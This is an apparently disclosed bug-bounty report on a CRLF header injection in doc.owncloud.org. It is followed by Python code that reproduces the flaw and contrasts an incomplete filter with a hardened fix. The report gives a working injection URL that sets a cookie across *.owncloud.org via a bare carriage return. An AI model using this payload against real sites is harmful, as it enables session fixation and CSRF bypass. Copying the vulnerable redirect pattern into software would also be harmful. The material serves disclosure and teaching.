[doc.owncloud.org] CRLF Injection

Disclosed: 2016-11-02 13:38:30 By bobrov To owncloud
Vulnerability Details
**PoC**: `http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;`

**HTTP Response**:

```
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n
Server: Apache\r\n
Location: https://doc.owncloud.org/#\r < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n
```

**Result**: Creating a cookie-param "crlf=injection" on *.owncloud.org.

This vulnerability could be used in combination with others. For example, XSS via Cookie, bypass of Double Submit Cookie CSRF protection, or session fixation.

The HTTP header delimiter \r (%0d) is supported by any web browser other than Firefox.

HTTP Strict Transport Security can block the attack if the user has already visited the site doc.owncloud.org.
Report Stats
  • Report ID: 154275
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
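
The redirect behaviour shown in the report, next to an incomplete fix and a hardened one, as an added example that is not part of the original report or ownCloud's code. All function names are hypothetical; the only inputs taken from the page are the host and the PoC request path.

```python
import re
from urllib.parse import quote, unquote

HOST = "doc.owncloud.org"  # host named in the report
# Request path from the report's PoC, used here only as test input.
POC_PATH = "/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;"


def reflected_location(raw_path: str) -> str:
    """Behaviour shown in the report: decoded path copied into Location."""
    return f"https://{HOST}{unquote(raw_path)}"


def pair_only_filter(raw_path: str) -> str:
    """Incomplete fix: removes only the CRLF pair, so a bare CR survives."""
    return f"https://{HOST}{unquote(raw_path).replace(chr(13) + chr(10), '')}"


def safe_location(raw_path: str) -> str:
    """Decode once, then percent-encode everything except '/' and unreserved
    characters, so no control character can reach the header."""
    return f"https://{HOST}{quote(unquote(raw_path), safe='/')}"


def lenient_header_lines(value: str) -> list:
    """Split the way a lenient client would: on CRLF, bare CR or bare LF."""
    return re.split(r"\r\n|\r|\n", value)


def assert_header_safe(value: str) -> str:
    """Last-line guard for any header value: refuse C0 controls and DEL."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    return value


if __name__ == "__main__":
    # Show how many header lines each builder's output turns into.
    for build in (reflected_location, pair_only_filter, safe_location):
        print(build.__name__, lenient_header_lines(build(POC_PATH)))
```

The pair-only filter is included because a check for `\r\n` alone does not cover the bare `\r` delimiter the report relies on.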